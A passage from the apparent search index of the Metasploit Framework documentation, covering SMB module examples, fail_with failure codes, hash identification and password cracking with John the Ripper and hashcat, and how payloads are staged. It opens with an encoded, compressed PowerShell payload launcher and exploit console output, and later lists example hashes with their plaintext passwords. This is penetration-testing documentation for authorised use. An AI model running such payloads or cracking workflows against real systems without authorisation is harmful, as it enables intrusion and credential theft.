System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAA3UKl8CA51WXW/bNhR996+48LRaQizCNroOCJBirpJuAbLWqLzlwTAQmrqOtcikR1L+QOL/XlKiLDlO0GV6sUVennvuuR/UTzASG5TznEMItzLVGjnMdvDJ/IxzyVHCO7ika4Q/qEx2rZaxZDoVHH5HHd7ijGUpcg2txxaYx9swuIAvuAm/zv5BpiEc71b4hS7RLGpi7KPCvjImfym8xDnNMx1JTMxOSjNlIDwtczxYjaTY7sgzC7PeWKlsW/ua4qoKrfUIxf6ISrr0y/+TWMuU30+9SCyXlCfd49VYZUzwZ4uXYsMzQZNiNXCYUjBUCpwAS5HkGVqCv/kBlCbpHPzKDYT4L7RnKU/aQbFZnivOZqky8hvJL4zLnfm/JFa1WLAH1IqM2erGWUzfm+f0IFGaSm39Os/FrkvRRcNuyBiutAEs0+GXVPav0ZW4RqnwlPEBupHyl5hHI+eo3f91QPofyIce6be7NgrnulXKp7REurRcS2hiyiwu1gzHml2ZnZKcrZS2S0aDmlJZXIG9wg5Zbip+R+LK1Hf+u97clBR2/UdvbND3EFIFk6Mz33ApNEYodTpPGdX4N83ShNq6i2iWzSh7mAbBC3TIMNcLW7T20FC9pEvQSF4tSB1QU7HJbKdxMp169teWXY+QQc88Tz8/9vZOVORJte1PNG41Qc5EYmv6/HwYR9fXgRX6k7Xx27emOMVGlZMhXmCWgcw5N9ZgZMiVKdA2nIGHfH1u37ht7zOzZjJy2GBiucp1vXnHI7HayfR+ocGPAhj0+r/AnymTQom5hkjIlZCFfASG1qO1VCDROFhjQu74HXf15zQhdlyhX0fX7XXrF3KD/F4vmkVTdW+zbE6q5m1STc6mcGMgrTau88mB59u5Vqc+C3lF2cJwLkEh5YfJUlvVtO3jHw3kgFTRlrOrQgqervlaPGB4tV0ZbZXR+4CyP+7ENynRGcXQMXkuWNwIVmQyICOqF2a187Hzv1O3WaQZ+r6XFj1QHv+GNPHLiu9Crwve0bkAQo7QO8ntlaWPydiE8tol5aaDNSFFiFcu5BrF9Di1VBpobkgVMlfhgJcGz8rKjASr5UkCIKyGbQk++PiuD0/wNddhiQpOiiOoARSCVMBG5B+kADo1yNYS8VBKISe96ZGzButin7AMqfSDlxhcNF9M429bp530n8qnhvlh6zRL5aRxqjOfs1wtDvevG4PuRokyodDFU9+IsRar6ho03xCtw7fDITnuEoTQXT52gHwHT7D+aT8JAAA='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))\" [*] 172.16.60.128:445 - Delete Windows\\Temp\\payload.bat on \\\\172.16.60.128\\C$ remote share [*] Exploit completed, but no session was created. ",
    "url": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html#examples",
    "relUrl": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html#examples"
  },"188": {
    "doc": "Guidelines for Writing Modules with SMB",
    "title": "Guidelines for Writing Modules with SMB",
    "content": "This is a simple guideline to write SMB-based modules, focusing on the new RubySMB implementation that includes SMB3 support. ",
    "url": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html",
    "relUrl": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html"
  },"189": {
    "doc": "Fail_with",
    "title": "On this page",
    "content": ". | Example uses | Comprehensive list of fail_with parameters | . When a module fails, the fail_with method provides a standardized way to describe the reason for the failure. The first parameter depends on the cause of the failure. ",
    "url": "/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html#on-this-page",
    "relUrl": "/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html#on-this-page"
  },"190": {
    "doc": "Fail_with",
    "title": "Example uses",
    "content": "modules/exploits/osx/local/sudo_password_bypass.rb fails using Failure::NotVulnerable if the check method does not indicate that the target is vulnerable: . if check != CheckCode::Vulnerable fail_with Failure::NotVulnerable, 'Target is not vulnerable' end . modules/exploits/multi/http/struts2_namespace_ognl.rb fails using the Failure::PayloadFailed if the target’s response does not include a string indicating that the payload successfully executed. Alternatively, if the target responds with an HTTP error, the module invokes fail_with using the Failure::UnexpectedReply parameter: . if r &amp;amp;&amp;amp; r.headers &amp;amp;&amp;amp; r.headers['Location'].split('/')[1] == success_string print_good(\"Payload successfully dropped and executed.\") elsif r &amp;amp;&amp;amp; r.headers['Location'] vprint_error(\"RESPONSE: \" + r.headers['Location']) fail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\") elsif r &amp;amp;&amp;amp; r.code == 400 fail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while executing the payload\") end . ",
    "url": "/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html#example-uses",
    "relUrl": "/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html#example-uses"
  },"191": {
    "doc": "Fail_with",
    "title": "Comprehensive list of fail_with parameters",
    "content": "The following are currently used fail_with parameters and a brief description of common uses. | fail_with parameter | Reason for failure | . | Failure::BadConfig | The user-provided parameters are invalid and must be corrected. | . | Failure::Disconnected | The target closed the connection forcibly. | . | Failure::NoAccess | An attempt to authenticate failed, likely due to invalid credentials. | . | Failure::None | The outcome for the module has already been met, for example a privilege escalation is already in an elevated context) | . | Failure::NoTarget | The specified TARGET or PAYLOAD variables are misconfigured or the target environment is unsupported. | . | Failure::NotFound | A preexisting file or resource on target is missing. | . | Failure::NotVulnerable | The target returned a response indicative of being patched or otherwise mitigated. | . | Failure::PayloadFailed | A return code from payload execution indicates the payload did not execute or terminated unexpectedly. | . | Failure::TimeoutExpired | The target did not respond to the connection request in a timely manner. Check RHOSTS and RPORT, then consider increasing WFSDelay. | . | Failure::UnexpectedReply | The target responded in an entirely unexpected way, and may not be running the vulnerable service at all. | . | Failure::Unknown | An entirely unexpected exception occurred, and the target may not be running the expected services at all. | . | Failure::Unreachable | The host or service is not reachable, often indicated by a refused connection or ICMP “unreachable” message. | . ",
    "url": "/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html#comprehensive-list-of-fail_with-parameters",
    "relUrl": "/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html#comprehensive-list-of-fail_with-parameters"
  },"192": {
    "doc": "Fail_with",
    "title": "Fail_with",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html",
    "relUrl": "/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html"
  },"193": {
    "doc": "Hashes and Password Cracking",
    "title": "Intro",
    "content": "This article will discuss the various libraries, dependencies, and functionality built in to metasploit for dealing with password hashes, and cracking them. In general, this will not cover storing credentials in the database, which can be read about here. Metasploit currently support cracking passwords with John the Ripper and hashcat. ",
    "url": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#intro",
    "relUrl": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#intro"
  },"194": {
    "doc": "Hashes and Password Cracking",
    "title": "Hashes",
    "content": "Many modules dump hashes from various software. Anything from the OS: Windows, OSX, and Linux, to applications such as postgres, and oracle. Similar, to the hash-identifier project, Metasploit includes a library to identify the type of a hash in a standard way. identify.rb can be given a hash, and will return the jtr type. Metasploit standardizes to John the Ripper’s types. While you may know the hash type being dumped already, using this library will help standardize future changes. ",
    "url": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#hashes",
    "relUrl": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#hashes"
  },"195": {
    "doc": "Hashes and Password Cracking",
    "title": "Hash Identify Example",
    "content": "In this first, simple, example we will simply show loading the library and calling its function. require 'metasploit/framework/hashes/identify' puts identify_hash \"$1$28772684$iEwNOgGugqO9.bIz5sk8k/\" # note, bad hashes return an empty string since nil is not accepted when creating credentials in msf. puts identify_hash \"This_is a Fake Hash\" puts identify_hash \"_9G..8147mpcfKT8g0U.\" . In practice, we receive the following output from this: . msf5 &amp;gt; irb [*] Starting IRB shell... [*] You are in the \"framework\" object irb: warn: can't alias jobs from irb_jobs. &amp;gt;&amp;gt; require 'metasploit/framework/hashes/identify' =&amp;gt; false &amp;gt;&amp;gt; puts identify_hash \"$1$28772684$iEwNOgGugqO9.bIz5sk8k/\" md5 =&amp;gt; nil &amp;gt;&amp;gt; puts identify_hash \"This_is a Fake Hash\" =&amp;gt; nil &amp;gt;&amp;gt; puts identify_hash \"_9G..8147mpcfKT8g0U.\" des,bsdi,crypt . ",
    "url": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#hash-identify-example",
    "relUrl": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#hash-identify-example"
  },"196": {
    "doc": "Hashes and Password Cracking",
    "title": "Crackers",
    "content": "Differences Between Hashcat vs JtR . This section will cover the differences between the two crackers. This is not a comparison of speed, or why one may work better in a specific case than another. General Settings . | Description | JtR | hashcat | . | session | --session | --session | . | no logging | --no-log | --logfile-disable | . | config file | --config | (n/a) | . | previous cracks | --pot | --potfile-path | . | type of hashes | --format | --hash-type | . | wordlist | --wordlist | (last parameter) | . | incremental | --incremental | --increment | . | rules | --rules | --rules-file | . | max run time | --max-run-time | --runtime | . | show results | --show | --show | . Hash Setting . | Hash | JtR | hashcat | . | List formats | john --list=formats john --list=format-all-details | hashcat -h | . | &nbsp; | &nbsp; | &nbsp; | . | cram-md5 | hmac-md5 | 10200 | . | des | descrypt | 1500 | . | md5 (crypt is $1$) | md5crypt | 500 | . | sha1 | &nbsp; | 100 | . | bsdi | bsdicrypt | 12400 | . | sha256 | sha256crypt | 7400 | . | sha512 | sha512crypt | 1800 | . | blowfish | bcrypt | 3200 | . | lanman | lm | 3000 | . | NTLM | nt | 1000 | . | mssql (05) | mssql | 131 | . | mssql12 | mssql12 | 1731 | . | mssql (2012/2014) | mssql05 | 132 | . | oracle (10) | oracle | 3100 | . | oracle 11 | oracle11 | 112 | . | oracle 12 | oracle12c | 12300 | . | postgres | dynamic_1034 | 12 | . | mysql | mysql | 200 | . | mysql-sha1 | mysql-sha1 | 300 | . | sha512($p.$s) - vmware ldap | dynamic_82 | 1710 | . | md5 (raw, unicode) | Raw-MD5u | 30 (with an empty salt) | . | NetNTLMv1 | netntlm | 5500 | . | NetNTLMv2 | netntlmv2 | 5600 | . | pbkdf2-sha256 | PBKDF2-HMAC-SHA256 | 10900 | . | Android (Samsung) SHA1 | &nbsp; | 5800 | . | Android (non-Samsung) SHA1 | &nbsp; | 110 | . | Android MD5 | &nbsp; | 10 | . | xsha | xsha | 122 | . | xsha512 | xsha512 | 1722 | . | PBKDF2-HMAC-SHA512 | PBKDF2-HMAC-SHA512 | 7100 | . | PBKDF2-HMAC-SHA1 | PBKDF2-HMAC-SHA1 | 12001 | . | PHPass | phpass | 400 | . | mediawiki | mediawiki | 3711 | . While Metasploit standardizes with the JtR format, the hashcat library includes the jtr_format_to_hashcat_format function to translate from jtr to hashcat. Cracker Modes . Each crack mode is a set of rules which apply to that specific mode. The idea being any optimizations can be applied to that mode, and reset on other modes. These modes include: . | Incremental | Wordlist | Pin (mobile devices - hashcat specific) | Normal (jtr specific) | Single (jtr specific) | . Hashcat Optimized Kernel . Hashcat contains a -O flag which uses an optimized kernel. From internal testing it looks to be &amp;gt;200% faster, with a password length tradeoff. For more information see https://github.com/rapid7/metasploit-framework/pull/12790 . Exporting Passwords and Hashes . Hashes can be exported to three different file formats by using the creds command and specifying an output file with the -o option. When the file ends in .jtr or .hcat the John the Ripper or Hashcat formats will be used respectively. Any other file suffix will result in the data being exported in a CSV format. Warning: When exporting in either the John the Ripper or Hashcat formats, any hashes that can not be handled by the formatter will be omitted. See the Adding a New Hash section for details on updating the formatters. Exported hashes can be filtered by a few fields like the username, and realm. One additional useful field is the hash type which can be specified with the -t/--type option. The type can be password, ntlm, hash or any of the John the Ripper format names such as netntlmv2. Example to export all NetNTLMv2 secrets for the WORKGROUP realm for use with John the Ripper: creds --realm WORKGROUP --type netntlmv2 -o /path/to/netntlmv2_hashes.jtr . ",
    "url": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#crackers",
    "relUrl": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#crackers"
  },"197": {
    "doc": "Hashes and Password Cracking",
    "title": "Example Hashes",
    "content": "Hashcat . | hashcat.net | . JtR . | pentestmonkey.net | openwall.info | . For testing Hashcat/JtR integration, this is a common list of commands to import example hashes of many different types. When possible the username is separated by an underscore, and anything after it is the password. For example des_password, the password for the hash is password: . # nix creds add user:des_password hash:rEK1ecacw.7.c jtr:des creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5 creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256,crypt creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512,crypt creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf # windows creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C jtr:lm creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt creds add user:u4-netntlm hash:u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c jtr:netntlm creds add user:admin hash:admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030 jtr:netntlmv2 creds add user:mscash-test1 hash:M$test1#64cd29e36a8431a2b111378564a10631 jtr:mscash creds add user:mscash2-hashcat hash:$DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f jtr:mscash2 # sql creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05 creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12 creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1 ## oracle (10) uses usernames in the hashing, so we can't override that here creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle ## oracle 11/12 H value, username is used creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle ## oracle 11/12 uses a LONG format, see lib/msf/core/auxiliary/jtr.rb creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c ## postgres uses username, so we can't override that here creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860 # mobile creds add user:samsungsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-samsung-sha1 creds add user:androidsha1 hash:9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5 jtr:android-sha1 creds add user:androidmd5 hash:1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 jtr:android-md5 # OSX creds add user:xsha_hashcat hash:1430823483d07626ef8be3fda2ff056d0dfd818dbfe47683 jtr:xsha creds add user:pbkdf2_hashcat hash:$ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f96cbcb20a1ffb400718c20382030f637892f776627d34e021bad4f81b7de8222 jtr:PBKDF2-HMAC-SHA512 creds add user:xsha512_hashcat hash:648742485c9b0acd786a233b2330197223118111b481abfa0ab8b3e8ede5f014fc7c523991c007db6882680b09962d16fd9c45568260531bdb34804a5e31c22b4cfeb32d jtr:xsha512 # webapps creds add user:mediawiki_hashcat hash:$B$56668501$0ce106caa70af57fd525aeaf80ef2898 jtr:mediawiki creds add user:phpass_p_hashcat hash:$P$984478476IagS59wHZvyQMArzfx58u. jtr:phpass creds add user:phpass_h_hashcat hash:$H$984478476IagS59wHZvyQMArzfx58u. jtr:phpass creds add user:atlassian_hashcat hash:{PKCS5S2}NzIyNzM0NzY3NTIwNjI3MdDDis7wPxSbSzfFqDGf7u/L00kSEnupbz36XCL0m7wa jtr:PBKDF2-HMAC-SHA1 # other creds add user:hmac_password hash:'&amp;lt;[email protected]&amp;gt;#3f089332842764e71f8400ede97a84c9' jtr:hmac-md5 creds add user:vmware_ldap hash:'$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6' jtr:dynamic_82 creds add user:admin hash:'$pbkdf2-sha256$260000$Q1hzYjU5dFNMWm05QUJCTg$s.vmjGlIV0ZKV1Sp3dTdrcn/i9CTqxPZ0klve4HreeU' jtr:pbkdf2-sha256 . This data breaks down to the following table: . | Hash Type | Username | Hash | Password | jtr format | Modules which dump this info | Modules which crack this | . | DES | des_password | rEK1ecacw.7.c | password | des | post/aix/gather/hashdump | auxiliary/analyze/crack_aix auxiliary/analyze/crack_linux | . | MD5 | md5_password | $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ | password | md5 | post/linux/gather/hashdump | auxiliary/analyze/crack_linux | . | BSDi | bsdi_password | _J9..K0AyUubDrfOgO4s | password | bsdi | post/linux/gather/hashdump | auxiliary/analyze/crack_linux | . | SHA256 | sha256_password | $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 | password | sha256,crypt | post/linux/gather/hashdump | auxiliary/analyze/crack_linux | . | SHA512 | sha512_password | $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 | password | sha512,crypt | post/linux/gather/hashdump | auxiliary/analyze/crack_linux | . | Blowfish | blowfish_password | $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe | password | bf | post/linux/gather/hashdump | auxiliary/analyze/crack_linux | . | Lanman | lm_password | E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C | password | lm | post/windows/gather/hashdump | auxiliary/analyze/crack_windows | . | NTLM | nt_password | AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C | password | nt | post/linux/gather/hashdump | auxiliary/analyze/crack_windows | . | NetNTLMv1 | u4-netntlm | u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c | hashcat | netntlm | &nbsp; | auxiliary/analyze/crack_windows | . | NetNTLMv2 | admin | admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030 | hashcat | netntlmv2 | &nbsp; | auxiliary/analyze/crack_windows | . | MSCash | mscash-test1 | M$test1#64cd29e36a8431a2b111378564a10631 | test1 | mscash | &nbsp; | auxiliary/analyze/crack_windows | . | MSCash2 | mscash2-hashcat | $DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f | hashcat | mscash2 | &nbsp; | auxiliary/analyze/crack_windows | . | MSSQL (2005) | mssql05_toto | 0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 | toto | mssql05 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases | . | MSSQL | mssql_foo | 0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 | foo | mssql | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases | . | MSSQL (2012) | mssql12_Password1! | 0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 | Password! | mssql12 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases | . | MySQL | mysql_probe | 445ff82636a7ba59 | probe | mysql | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/analyze/crack_databases | . | MySQL SHA1 | mysql-sha1_tere | *5AD8F88516BD021DD43F171E2C785C69F8E54ADB | tere | mysql-sha1 | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/analyze/crack_databases | . | Oracle | simon | 4F8BC1809CB2AF77 | A | des,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases | . | Oracle | SYSTEM | 9EEDFA0AD26C6D52 | THALES | des,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases | . | Oracle 11 | DEMO | S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C | epsilon | raw-sha1,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases | . | Oracle 11 | oracle11_epsilon | S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C | epsilon | raw-sha1,oracle | modules/auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases | . | Oracle 12 | oracle12_epsilon | H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B | epsilon | pbkdf2,oracle12c | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases | . | Postgres | example | md5be86a79bf2043622d58d5453c47d4860 | password | raw-md5,postgres | auxiliary/scanner/postgres/postgres_hashdump | auxiliary/analyze/crack_databases | . | Android (Samsung) SHA1 | samsungsha1 | D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 | 1234 | android-samsung-sha1 | post/android/gather/hashdump | modules/auxiliary/analyze/crack_mobile | . | Android (non-Samsung) SHA1 | androidsha1 | 9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5 | 1234 | android-sha1 | post/android/gather/hashdump | modules/auxiliary/analyze/crack_mobile | . | Android MD5 | androidmd5 | 1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 | 1234 | android-md5 | post/android/gather/hashdump | modules/auxiliary/analyze/crack_mobile | . | OSX 10.4-10.6 | xsha_hashcat | 1430823483d07626ef8be3fda2ff056d0dfd818dbfe47683 | hashcat | xsha | post/osx/gather/hashdump | modules/auxiliary/analyze/crack_osx | . | OSX 10.8+ | pbkdf2_hashcat | $ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f9$ | hashcat | PBKDF2-HMAC-SHA512 | post/osx/gather/hashdump | modules/auxiliary/analyze/crack_osx | . | OSX 10.7 | xsha512_hashcat | 648742485c9b0acd786a233b2330197223118111b481abfa0ab8b3e8ede5f014fc7c523991c007db6882680b09962d16fd9c45568260531bdb34804a5e31c22b4cfeb32d | hashcat | xsha512 | post/osx/gather/hashdump | modules/auxiliary/analyze/crack_osx | . | HMAC-MD5 | hmac_password | &amp;lt;[email protected]&amp;gt;#3f089332842764e71f8400ede97a84c9 | password | hmac-md5 | auxiliary/server/capture/smtp | &nbsp; | . | SHA512($p.$s)/dynamic_82/vmware ldap | vmware_ldap | $dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6 | TestPass123# | dynamic_82 | &nbsp; | &nbsp; | . | MediaWiki | mediawiki_hashcat | $B$56668501$0ce106caa70af57fd525aeaf80ef2898 | hashcat | mediawiki | &nbsp; | modules/auxiliary/analyze/crack_webapps | . | PHPPass (P type) | phpass_p_hashcat | $P$984478476IagS59wHZvyQMArzfx58u. | hashcat | phpass | &nbsp; | modules/auxiliary/analyze/crack_webapps | . | PHPPass (H type) | phpass_h_hashcat | $H$984478476IagS59wHZvyQMArzfx58u. | hashcat | phpass | &nbsp; | modules/auxiliary/analyze/crack_webapps | . | Atlassian | atlassian_hashcat | {PKCS5S2}NzIyNzM0NzY3NTIwNjI3MdDDis7wPxSbSzfFqDGf7u/L00kSEnupbz36XCL0m7wa | hashcat | PBKDF2-HMAC-SHA1 | &nbsp; | modules/auxiliary/analyze/crack_webapps | . ",
    "url": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#example-hashes",
    "relUrl": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#example-hashes"
  },"198": {
    "doc": "Hashes and Password Cracking",
    "title": "Adding a New Hash",
    "content": "Only hashes which were found in Metasploit were added to the hash id library, and the other functions. New hashes are developed often, and new modules which find a new type of hash will most definitely be created. So what are the steps to add a new hash type to Metasploit? . | Add a new identify algorithm to: framework/hashes.rb. You may want to consult external programs such as hashid or hash-identifier for suggestions. | Add the hash to the spec to ensure it works right now, and in future updates: framework/hashes/identify_spec.rb | . | Make sure the hashes are saved in the DB in the JTR format. A good source to identify what the hashes look like is pentestmonkey. | If applicable, add it into the appropriate cracker module (or create a new one). Example for Windows related hashes. | Find the hashcat hash mode, and add a JTR name to hashcat hash mode lookup | If hashcat uses a different format for the hash string, add a JTR to hashcat hash format conversion to the formatter | Update this Wiki . | Add the JTR to hashcat conversion | Add example hash(es) | . | . ",
    "url": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#adding-a-new-hash",
    "relUrl": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#adding-a-new-hash"
  },"199": {
    "doc": "Hashes and Password Cracking",
    "title": "Hashes and Password Cracking",
    "content": " ",
    "url": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html",
    "relUrl": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html"
  },"200": {
    "doc": "How payloads work",
    "title": "How Payloads Work",
    "content": "Payload modules are stored in modules/payloads/{singles,stages,stagers}/&amp;lt;platform&amp;gt;. When the framework starts up, stages are combined with stagers to create a complete payload that you can use in exploits. Then, handlers are paired with payloads so the framework will know how to create sessions with a given communications mechanism. Payloads are given reference names that indicate all the pieces, like so: . | Staged payloads: &amp;lt;platform&amp;gt;/[arch]/&amp;lt;stage&amp;gt;/&amp;lt;stager&amp;gt; | Single payloads: &amp;lt;platform&amp;gt;/[arch]/&amp;lt;single&amp;gt; | . This results in payloads like windows/x64/meterpreter/reverse_tcp. Breaking that down, the platform is windows, the architecture is x64, the final stage we’re delivering is meterpreter, and the stager delivering it is reverse_tcp. Note that architecture is optional because in some cases it is either unnecessary or implied. An example is php/meterpreter/reverse_tcp. Arch is unneeded for PHP payloads because we’re delivering interpreted code rather than native. Singles . Single payloads are fire-and-forget. They can create a communications mechanism with Metasploit, but they don’t have to. An example of a scenario where you might want a single is when the target has no network access – a fileformat exploit delivered via USB key is still possible. Stagers . Stagers are a small stub designed to create some form of communication and then pass execution to the next stage. Using a stager solves two problems. First, it allows us to use a small payload initially to load up a larger payload with more functionality. Second, it makes it possible to separate the communications mechanism from the final stage so one payload can be used with multiple transports without duplicating code. Stages . Since the stager will have taken care of dealing with any size restrictions by 